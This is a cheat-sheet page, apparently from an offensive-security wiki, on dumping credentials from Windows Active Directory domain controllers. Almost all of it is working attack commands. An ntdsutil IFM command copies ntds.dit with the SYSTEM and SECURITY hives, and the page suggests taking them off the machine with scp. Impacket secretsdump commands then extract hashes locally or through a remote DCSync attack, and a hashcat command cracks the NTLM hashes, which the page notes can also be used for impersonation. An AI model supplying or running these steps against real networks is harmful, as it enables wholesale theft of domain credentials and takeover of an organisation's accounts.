Domain Controller

NTDS Domain Controller

NTDS (Active Directory Database) stores domain-related information in Windows environments. The NTDS data is stored in the following locations:

NTDS Database:
```
C:\Windows\NTDS\ntds.dit
```
System Configuration:
```
C:\Windows\System32\config\SYSTEM
```
Security Configuration:
```
C:\Windows\System32\config\SECURITY
```

Local Dumping (No Credentials)

To access the NTDS database locally, use the following PowerShell command:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can export ntds.dit, SYSTEMand SECURITYusing scp.

Then, use the Impacket suite to crack the data.

python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local

Remote Dumping (With Credentials)

DC Sync Attack

DC Sync is possible when an account has one of the following permissions:

Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes in Filtered Set

To dump hashes remotely with DC Sync, use Impacket:

python3.9 /opt/impacket/examples/secretsdump.py -just-dc <DOMAIN>/<AD_Admin_User>@<IP>  # For NTDS  
python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm <DOMAIN>/<AD_Admin_User>@<IP>  # For NTLM hashes

Cracking NTLM Hashes

Once NTLM hashes are obtained, they can be used for impersonation or cracked to retrieve the password. To crack the hash, use Hashcat:

hashcat -m 1000 -a 0 /path/to/ntlm_hashes.txt /path/to/wordlist/such/as/rockyou.txt

PreviousCredential manager NextLocal Administrator Password Solution (LAPS)

Last updated 1 year ago

hashtagNTDS Domain Controller

hashtagLocal Dumping (No Credentials)

hashtagRemote Dumping (With Credentials)

hashtagDC Sync Attack

hashtagCracking NTLM Hashes

NTDS Domain Controller

Local Dumping (No Credentials)

Remote Dumping (With Credentials)

DC Sync Attack

Cracking NTLM Hashes